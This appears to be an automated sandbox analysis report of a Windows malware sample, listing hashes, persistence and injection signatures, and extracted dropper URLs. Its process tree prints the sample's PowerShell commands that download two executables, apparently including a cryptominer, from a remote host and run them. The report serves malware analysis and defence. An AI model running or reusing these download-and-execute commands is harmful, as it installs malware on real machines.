Analysis

  • max time kernel
    120s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    26/12/2023, 02:55

General

  • Target

    4e28029fbd291d72f711778ca5b974e2.exe

  • Size

    4.2MB

  • MD5

    4e28029fbd291d72f711778ca5b974e2

  • SHA1

    9e8a6e2c2da0e5e6459e52a9bf76963ca05ee6fa

  • SHA256

    374bd3c40a4cea98435b893e890b9d66637a73671d54ce1faebb29134c831942

  • SHA512

    b9de32234b06be44d8d9e4d48c9b47487eec0a0d48077c2f8769301b55ffd7136c894e93857acce06a83ed5e2d917d5c22239a65b03db7a44e1acb16b11ad2d4

  • SSDEEP

    98304:PwpXIqnx5dwTto4URFdBFnTBfrmRuBO17n7TZAAH3KC:PwpXIqbmTtNURHBFBhs1r71PHJ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://galaxystar.cc/upd/clinet-1.exe

exe.dropper

https://galaxystar.cc/upd/cgminer.exe

Signatures

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4e28029fbd291d72f711778ca5b974e2.exe
    "C:\Users\Admin\AppData\Local\Temp\4e28029fbd291d72f711778ca5b974e2.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:2164
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://galaxystar.cc/upd/clinet-1.exe,https://galaxystar.cc/upd/cgminer.exe -Destination hkx.exe,kWH.exe;
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2160
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -command Start-Process hkx.exe; Start-Process kWH.exe;
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2856

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    e7dd3116fdae9499cbed5a5142a09a46

    SHA1

    ed93f74cd512e704a69a394828bad6d5630c95b1

    SHA256

    4f2c721e7a1342c89abf7dcf70c47acc0b0fddd1ffb03f3dc72758b1f63a3b88

    SHA512

    542ff782b478826ade1226d354a299b9824bd9d82f4f7250a1e663188017381c4c546cde2a13b9ee1b707dd6ebfa503c5782d32406c35c9a964eddc3642683d1

  • memory/2160-6-0x00000000733B0000-0x000000007395B000-memory.dmp

    Filesize

    5.7MB

  • memory/2160-7-0x00000000028B0000-0x00000000028F0000-memory.dmp

    Filesize

    256KB

  • memory/2160-17-0x00000000733B0000-0x000000007395B000-memory.dmp

    Filesize

    5.7MB

  • memory/2856-24-0x00000000029A0000-0x00000000029E0000-memory.dmp

    Filesize

    256KB

  • memory/2856-23-0x0000000072E00000-0x00000000733AB000-memory.dmp

    Filesize

    5.7MB

  • memory/2856-25-0x0000000072E00000-0x00000000733AB000-memory.dmp

    Filesize

    5.7MB